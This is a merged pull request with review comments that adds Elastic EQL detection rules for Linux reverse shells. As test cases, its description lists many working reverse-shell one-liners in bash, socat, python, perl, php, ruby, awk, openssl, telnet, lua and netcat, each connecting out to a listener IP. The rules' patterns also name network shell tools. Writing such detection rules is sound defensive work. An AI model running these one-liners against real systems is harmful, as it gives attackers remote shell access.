### PR TITLE
[New Rules] Linux Reverse Shells

### PR DESCRIPTION
**Pull request by Aegrah**
## Summary
This PR proposes the addition of 5 new rules to detect Linux reverse shell activity, and deprecate "execution_reverse_shell_via_named_pipe.toml" because this rule did barely capture any reverse shell behavior while testing, and all of its functionality is now implemented in the newly proposed rules. 

While creating these rules, I used https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md amongst other sources. I pretty much ran every single (uncompiled) reverse shell on the list, and they are all being detected by 1 or more of the rules below. 

The following new rules are proposed:
- Potential Reverse Shell
- Potential Reverse Shell via Suspicious Child Process
- Potential Reverse Shell via Suspicious Parent Process
- Potential Reverse Shell via Suspicious Binary
- Potential Reverse Shell via Java

These rules, when checked, will be ported over to Endpoint Rules. The UDP one will not be possible because it uses a sample and auditd_manager, but the other ones are possible. It will first go through review here though. 

## Potential Reverse Shell
This detection rule identifies suspicious network traffic patterns associated with TCP reverse shell activity. This activity consists of a parent-child relationship where a network event is followed by the creation of a shell process. An attacker may establish a Linux TCP reverse shell to gain remote access to a target system.

This rule focusses on shell activity, as shell activity follows (most of the time) a slightly different approach than using other lolbins such as interpreters. 

```
sequence by host.id with maxspan=1s
[ network where host.os.type == "linux" and event.type == "start" and event.action == "connection_attempted" and 
  process.name : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "socat") ] by process.entity_id
[ process where host.os.type == "linux" and event.type == "start" and event.action : ("exec", "fork") and 
  process.name : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and 
  process.parent.name : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "socat") ] by process.parent.entity_id
```
image

Amongst others, this rule detects the following reverse shells:
```
// sh
bash -i >& /dev/tcp/10.164.0.9/9001 0>&1
0<&196;exec 196<>/dev/tcp/10.164.0.9/9001; sh <&196 >&196 2>&196
/bin/bash -l > /dev/tcp/10.164.0.9/9001 0<&1 2>&1

//socat
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.164.0.9:9001
```
## Potential Reverse Shell via Suspicious Child Process
This detection rule detects the creation of a shell through a suspicious process chain. Any reverse shells spawned by the specified utilities that are initialized from a single process followed by a network connection attempt will be captured through this rule. Attackers may spawn reverse shells to establish persistence onto a target system.

```
sequence by host.id, process.entity_id with maxspan=1s
[ process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and (
  (process.name : "python*" and process.args : "-c") or
  (process.name : "php*" and process.args : "-r") or
  (process.name : "perl" and process.args : "-e") or
  (process.name : "ruby" and process.args : ("-e", "-rsocket")) or
  (process.name : "lua*" and process.args : "-e") or
  (process.name : "openssl" and process.args : "-connect") or
  (process.name : ("nc", "ncat", "netcat") and process.args_count >= 3) or
  (process.name : "telnet" and process.args_count >= 3) or
  (process.name : "awk")) and 
  process.parent.name : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") ]
[ network where host.os.type == "linux" and event.type == "start" and event.action == "connection_attempted" and 
  process.name : ("python*", "php*", "perl", "ruby", "lua*", "openssl", "nc", "netcat", "ncat", "telnet", "awk") ]
```
image

Amongst others, this rule detects most of the reverse shells that use the same process.entity_id to start the utility and execute the shell. This list is not exhaustive, but you get the point:
```
/ perl
perl -e 'use Socket;$i="10.164.0.9";$p=9001;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

// python ipv4
export RHOST="10.164.0.9";export RPORT=9001;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.164.0.9",9003));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.164.0.9",9003));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.164.0.9",9003));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'
python -c 'socket=__import__("socket");os=__import__("os");pty=__import__("pty");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.164.0.9",9003));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
python -c 'socket=__import__("socket");subprocess=__import__("subprocess");os=__import__("os");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.164.0.9",9003));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
python -c 'socket=__import__("socket");subprocess=__import__("subprocess");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.164.0.9",9003));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'
python -c 'a=__import__;s=a("socket");o=a("os").dup2;p=a("pty").spawn;c=s.socket(s.AF_INET,s.SOCK_STREAM);c.connect(("10.164.0.9",9003));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'
python -c 'a=__import__;b=a("socket");p=a("subprocess").call;o=a("os").dup2;s=b.socket(b.AF_INET,b.SOCK_STREAM);s.connect(("10.164.0.9",9003));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p(["/bin/sh","-i"])'
python -c 'a=__import__;b=a("socket");c=a("subprocess").call;s=b.socket(b.AF_INET,b.SOCK_STREAM);s.connect(("10.164.0.9",9003));f=s.fileno;c(["/bin/sh","-i"],stdin=f(),stdout=f(),stderr=f())'
python -c 'a=__import__;s=a("socket").socket;o=a("os").dup2;p=a("pty").spawn;c=s();c.connect(("10.164.0.9",9003));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'
python -c 'a=__import__;b=a("socket").socket;p=a("subprocess").call;o=a("os").dup2;s=b();s.connect(("10.164.0.9",9003));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p(["/bin/sh","-i"])'
python -c 'a=__import__;b=a("socket").socket;c=a("subprocess").call;s=b();s.connect(("10.164.0.9",9003));f=s.fileno;c(["/bin/sh","-i"],stdin=f(),stdout=f(),stderr=f())'

// python ipv6
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("fe80::4001:aff:fea4:9",9003,0,2));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
python -c 'socket=__import__("socket");os=__import__("os");pty=__import__("pty");s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("fe80::4001:aff:fea4:9",9003,0,2));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
python -c 'a=__import__;c=a("socket");o=a("os").dup2;p=a("pty").spawn;s=c.socket(c.AF_INET6,c.SOCK_STREAM);s.connect(("fe80::4001:aff:fea4:9",4242,0,2));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'

// netcat
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.164.0.9 9010 >/tmp/f
rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.164.0.9 9002 >/tmp/f
nc 10.164.0.9 9001
ncat 10.164.0.9 9001

// php
php -r '$sock=fsockopen("10.164.0.9",9003);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.164.0.9",9001);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.164.0.9",9001);`/bin/sh -i <&3 >&3 2>&3`;'
php -r '$sock=fsockopen("10.164.0.9",9001);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.164.0.9",9001);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.164.0.9",9001);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
php -r '$sock=fsockopen("10.164.0.9",9001);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

// ruby
ruby -rsocket -e'f=TCPSocket.open("10.164.0.9",1337).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

// awk
awk 'BEGIN {s = "/inet/tcp/0/10.164.0.9/9001"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

// openssl
user@attack$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
user@attack$ openssl s_server -quiet -key key.pem -cert cert.pem -port 4242

user@victim$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.0.0.1:4242 > /tmp/s; rm /tmp/s

// telnet
telnet 10.164.0.9 9001 | /bin/sh | telnet 10.164.0.9 9002

// lua
lua -e 'local host, port = "10.164.0.9", 9001 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
```

## Potential Reverse Shell via Suspicious Parent Process
This detection rule detects the creation of a shell through a suspicious parent child relationship. Any reverse shells spawned by the specified utilities that use a forked process to initialize the connection attempt will be captured through this rule. Attackers may spawn reverse shells to establish persistence onto a target system. 

```
sequence by host.id, process.parent.entity_id with maxspan=1s
[ process where host.os.type == "linux" and event.type == "start" and event.action == "fork" and (
  (process.name : "python*" and process.args : "-c") or
  (process.name : "php*" and process.args : "-r") or
  (process.name : "perl" and process.args : "-e") or
  (process.name : "ruby" and process.args : ("-e", "-rsocket")) or
  (process.name : "lua*" and process.args : "-e") or
  (process.name : "openssl" and process.args : "-connect") or
  (process.name : ("nc", "ncat", "netcat") and process.args_count >= 3) or
  (process.name : "telnet" and process.args_count >= 3) or
  (process.name : "awk")) and 
  process.parent.name : ("python*", "php*", "perl", "ruby", "lua*", "openssl", "nc", "netcat", "ncat", "telnet", "awk") ]
[ network where host.os.type == "linux" and event.type == "start" and event.action == "connection_attempted" and 
  process.name : ("python*", "php*", "perl", "ruby", "lua*", "openssl", "nc", "netcat", "ncat", "telnet", "awk") ]
```
image

This rule was necessary because the rules above did not successfully identifies the following reverse shells:
```
// perl
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.164.0.9:10000");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

// ruby
ruby -rsocket -e'exit if fork;c=TCPSocket.new("10.164.0.9","10001");loop{c.gets.chomp!;(exit! if $_=="exit");($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))rescue c.puts "failed: #{$_}"}'
```

The reason for this is that the rules above don't take into account the process parent/child relationship for reverse shells that execute a shell by first doing a fork and then doing an exec. 

## Potential Reverse Shell via Suspicious Binary
This detection rule detects the creation of a shell through a chain consisting of the execution of a suspicious binary (located in a commonly abused location or executed manually) followed by a network event and ending with a shell being spawned. Stageless reverse tcp shells display this behaviour. Attackers may spawn reverse shells to establish persistence onto a target system.

```
sequence by host.id, process.entity_id with maxspan=1s
[ process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and
  process.executable : (
  "./*", "/tmp/*", "/var/tmp/*", "/var/www/*", "/dev/shm/*", "/etc/init.d/*", "/etc/rc*.d/*",
  "/etc/crontab", "/etc/cron.*", "/etc/update-motd.d/*", "/usr/lib/update-notifier/*",
  "/boot/*", "/srv/*", "/run/*", "/root/*", "/etc/rc.local"
   ) and
  process.parent.name : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and not
  process.name : ("curl", "wget", "ping", "apt", "dpkg", "yum", "rpm", "dnf", "dockerd") ]
[ network where host.os.type == "linux" and event.type == "start" and event.action == "connection_attempted" and
  process.executable : (
  "./*", "/tmp/*", "/var/tmp/*", "/var/www/*", "/dev/shm/*", "/etc/init.d/*", "/etc/rc*.d/*",
  "/etc/crontab", "/etc/cron.*", "/etc/update-motd.d/*", "/usr/lib/update-notifier/*",
  "/boot/*", "/srv/*", "/run/*", "/root/*", "/etc/rc.local"
   ) ]
[ process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and 
  process.name : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and 
  process.parent.name : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") ]
```

image

## Potential Reverse Shell via Java
This detection rule identifies the execution of a Linux shell process from a Java JAR application post an incoming network connection. This behavior may indicate reverse shell activity via a Java application.

I added this rule while the one for Endpoint is still in diag. 

```
sequence by host.id with maxspan=5s
[ network where host.os.type == "linux" and event.action in ("connection_accepted", "connection_attempted") and 
  process.executable : ("/usr/bin/java", "/bin/java", "/usr/lib/jvm/*", "/usr/java/*") ] by process.entity_id
[ process where host.os.type == "linux" and event.action == "exec" and 
  process.parent.executable : ("/usr/bin/java", "/bin/java", "/usr/lib/jvm/*", "/usr/java/*") and
  process.parent.args : "-jar"  and process.executable : "*sh" ] by process.parent.entity_id
```
image

### CODE REVIEW

**Comment by Aegrah** [comment]
Unit tests are failing because I used auditd_manager with fields that are previously unknown. My other open PR will fix this once it's merged.

File: rules/linux/execution_shell_via_udp_cli_utility_linux.toml [hunk 1]
```diff
@@ -0,0 +1,90 @@
+[metadata]
+creation_date = "2023/07/04"
+integration = ["auditd_manager"]
+maturity = "production"
+min_stack_comments = "New fields added: required_fields, related_integrations, setup"
+min_stack_version = "8.3.0"
```
Comment (Samirbous) [inline rules/linux/execution_shell_via_udp_cli_utility_linux.toml:6]:
```suggestion
min_stack_version = "8.6.0"
```

Comment (Samirbous) [reply rules/linux/execution_shell_via_udp_cli_utility_linux.toml:6]: IIRC sample was added in 8.5/8.6+

File: rules/linux/execution_shell_via_java_revshell_linux.toml [hunk 2]
```diff
@@ -0,0 +1,67 @@
...
+description = """
+This detection rule identifies the execution of a Linux shell process from a Java JAR application post an incoming
+network connection. This behavior may indicate reverse shell activity via a Java application.
+"""
+from = "now-9m"
+index = ["logs-endpoint.events.*"]
+language = "eql"
+license = "Elastic License v2"
+name = "Potential Linux Reverse Shell Activity via Java Detected"
+references = [
```
Comment (Samirbous) [inline rules/linux/execution_shell_via_java_revshell_linux.toml:20]:
```suggestion
name = "Potential Linux Reverse Shell Activity via Java"
references = [
```

File: rules/linux/execution_shell_via_java_revshell_linux.toml [hunk 3]
```diff
@@ -0,0 +1,67 @@
...
+    "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md"
+]
+risk_score = 73
+rule_id = "5a3d5447-31c9-409a-aed1-72f9921594fd"
+severity = "high"
```
Comment (Samirbous) [inline rules/linux/execution_shell_via_java_revshell_linux.toml:25]:
```suggestion
severity = "medium"
```

File: rules/linux/execution_shell_via_java_revshell_linux.toml [hunk 4]
```diff
@@ -0,0 +1,67 @@
...
+"""
+from = "now-9m"
+index = ["logs-endpoint.events.*"]
+language = "eql"
+license = "Elastic License v2"
+name = "Potential Linux Reverse Shell Activity via Java Detected"
+references = [
+    "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md"
+]
+risk_score = 73
```
Comment (Samirbous) [inline rules/linux/execution_shell_via_java_revshell_linux.toml:23]:
```suggestion
risk_score = 47
```

File: rules/linux/execution_shell_suspicious_parent_child_revshell_linux.toml [hunk 5]
```diff
@@ -0,0 +1,78 @@
...
+"""
+from = "now-9m"
+index = ["logs-endpoint.events.*"]
+language = "eql"
+license = "Elastic License v2"
+name = "Suspicious Shell and Network Activity by Potentially Malicious Parent Child Relationship Detected"
+references = [
+    "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md"
+]
+risk_score = 73
```
Comment (Samirbous) [inline rules/linux/execution_shell_suspicious_parent_child_revshell_linux.toml:24]:
```suggestion
risk_score = 47
```

File: rules/linux/execution_shell_suspicious_parent_child_revshell_linux.toml [hunk 6]
```diff
@@ -0,0 +1,78 @@
...
+rule_id = "4b1a807a-4e7b-414e-8cea-24bf580f6fc5"
+severity = "high"
```
Comment (Samirbous) [inline rules/linux/execution_shell_suspicious_parent_child_revshell_linux.toml:26]:
```suggestion
severity = "medium"
```

File: rules/linux/execution_shell_via_lolbin_interpreter_linux.toml [hunk 7]
```diff
@@ -0,0 +1,71 @@
...
+description = """
+This detection rule detects the creation of a shell through a suspicious process chain. Any reverse shells spawned by 
+the specified utilities that are initialized from a single process followed by a network connection attempt will be 
+captured through this rule. Attackers may spawn reverse shells to establish persistence onto a target system.
+"""
+from = "now-9m"
+index = ["logs-endpoint.events.*"]
+language = "eql"
+license = "Elastic License v2"
+name = "Potential Reverse Shell Activity via Linux Command Line Utility Detected"
```
Comment (Samirbous) [inline rules/linux/execution_shell_via_lolbin_interpreter_linux.toml:20]: too long for a rule.name 

```suggestion
name = "Potential Reverse Shell via Linux Utility"
```

File: rules/linux/execution_shell_via_reverse_tcp_utility_linux.toml [hunk 8]
```diff
@@ -0,0 +1,72 @@
...
+description = """
+This detection rule detects the creation of a shell through a chain consisting of the execution of a suspicious binary
+followed by a network event and ending with a shell being spawned. Stageless reverse tcp shells display this behaviour.
+Attackers may spawn reverse shells to establish persistence onto a target system.
+"""
+from = "now-9m"
+index = ["logs-endpoint.events.*"]
+language = "eql"
+license = "Elastic License v2"
+name = "Potential Reverse Shell Activity via Suspicious Process Detected"
```
Comment (Samirbous) [inline rules/linux/execution_shell_via_reverse_tcp_utility_linux.toml:20]:
```suggestion
name = "Potential Reverse Shell by a Suspicious Process"
```

File: rules/linux/execution_shell_via_tcp_cli_utility_linux.toml [hunk 9]
```diff
@@ -0,0 +1,68 @@
...
+description = """
+This detection rule identifies suspicious network traffic patterns associated with TCP reverse shell activity. This
+activity consists of a parent-child relationship where a network event is followed by the creation of a shell process.
+An attacker may establish a Linux TCP reverse shell to gain remote access to a target system.
+"""
+from = "now-9m"
+index = ["logs-endpoint.events.*"]
+language = "eql"
+license = "Elastic License v2"
+name = "Potential Reverse Shell Activity via Linux Shell Detected"
```
Comment (Samirbous) [inline rules/linux/execution_shell_via_tcp_cli_utility_linux.toml:20]:
```suggestion
name = "Potential Linux Reverse Shell Activity"
```

File: rules/linux/execution_shell_via_tcp_cli_utility_linux.toml [hunk 10]
```diff
@@ -0,0 +1,68 @@
...
+references = [
+    "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md"
+]
+risk_score = 73
+rule_id = "48b3d2e3-f4e8-41e6-95e6-9b2091228db3"
+severity = "high"
```
Comment (Samirbous) [inline rules/linux/execution_shell_via_tcp_cli_utility_linux.toml:26]:
```suggestion
severity = "medium"
```

File: rules/linux/execution_shell_via_tcp_cli_utility_linux.toml [hunk 11]
```diff
@@ -0,0 +1,68 @@
...
+"""
+from = "now-9m"
+index = ["logs-endpoint.events.*"]
+language = "eql"
+license = "Elastic License v2"
+name = "Potential Reverse Shell Activity via Linux Shell Detected"
+references = [
+    "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md"
+]
+risk_score = 73
```
Comment (Samirbous) [inline rules/linux/execution_shell_via_tcp_cli_utility_linux.toml:24]:
```suggestion
risk_score = 47
```

File: rules/linux/execution_shell_via_udp_cli_utility_linux.toml [hunk 12]
```diff
@@ -0,0 +1,90 @@
...
+For this detection rule no additional audit rules are required to be added to the integration. 
+```
+Add the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.
+"""
+references = [
+    "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md"
+]
+risk_score = 73
+rule_id = "a5eb21b7-13cc-4b94-9fe2-29bb2914e037"
+severity = "high"
```
Comment (Samirbous) [inline rules/linux/execution_shell_via_udp_cli_utility_linux.toml:42]:
```suggestion
severity = "medium"
```

File: rules/linux/execution_shell_via_udp_cli_utility_linux.toml [hunk 13]
```diff
@@ -0,0 +1,90 @@
...
+`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the "audit rules" configuration box or the "auditd rule files" box by specifying a file to read the audit rules from. 
+```
+For this detection rule no additional audit rules are required to be added to the integration. 
+```
+Add the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.
+"""
+references = [
+    "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md"
+]
+risk_score = 73
```
Comment (Samirbous) [inline rules/linux/execution_shell_via_udp_cli_utility_linux.toml:40]:
```suggestion
risk_score = 47
```

File: rules/linux/execution_shell_via_udp_cli_utility_linux.toml [hunk 14]
```diff
@@ -0,0 +1,90 @@
...
+This detection rule identifies suspicious network traffic patterns associated with UDP reverse shell activity. This 
+activity consists of a sample of an execve, socket and connect syscall executed by the same process, where the
+auditd.data.a0-1 indicate a UDP connection, ending with an egress connection event. An attacker may establish a Linux 
+UDP reverse shell to bypass traditional firewall restrictions and gain remote access to a target system covertly.
+"""
+from = "now-9m"
+index = ["auditbeat-*", "logs-auditd_manager.auditd-*"]
+language = "eql"
+license = "Elastic License v2"
+name = "Potential UDP Reverse Shell Activity via Linux Command Line Utility Detected"
```
Comment (Samirbous) [inline rules/linux/execution_shell_via_udp_cli_utility_linux.toml:21]:
```suggestion
name = "Potential UDP Reverse Shell"
```

File: rules/linux/execution_shell_via_reverse_tcp_utility_linux.toml [hunk 15]
```diff
@@ -0,0 +1,72 @@
...
+references = [
+    "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md"
+]
+risk_score = 73
```
Comment (Samirbous) [inline rules/linux/execution_shell_via_reverse_tcp_utility_linux.toml:24]:
```suggestion
risk_score = 47
```

File: rules/linux/execution_shell_via_reverse_tcp_utility_linux.toml [hunk 16]
```diff
@@ -0,0 +1,72 @@
...
+rule_id = "fa3a59dc-33c3-43bf-80a9-e8437a922c7f"
+severity = "high"
```
Comment (Samirbous) [inline rules/linux/execution_shell_via_reverse_tcp_utility_linux.toml:26]:
```suggestion
severity = "medium"
```

File: rules/linux/execution_shell_suspicious_parent_child_revshell_linux.toml [hunk 17]
```diff
@@ -0,0 +1,78 @@
...
+description = """
+This detection rule detects the creation of a shell through a suspicious parent child relationship. Any reverse shells
+spawned by the specified utilities that use a forked process to initialize the connection attempt will be captured 
+through this rule. Attackers may spawn reverse shells to establish persistence onto a target system. 
+"""
+from = "now-9m"
+index = ["logs-endpoint.events.*"]
+language = "eql"
+license = "Elastic License v2"
+name = "Suspicious Shell and Network Activity by Potentially Malicious Parent Child Relationship Detected"
```
Comment (Samirbous) [inline rules/linux/execution_shell_suspicious_parent_child_revshell_linux.toml:20]:
```suggestion
name = "Suspicious Shell Network Activity"
```

**Review by Samirbous — COMMENTED** [review]
severity can be bumped up once diag phase is completed (no high # of FPs)

**Review by Samirbous — APPROVED** [review]
nice additions!

**Review by shashank-elastic — APPROVED** [review]

**Pull request merged**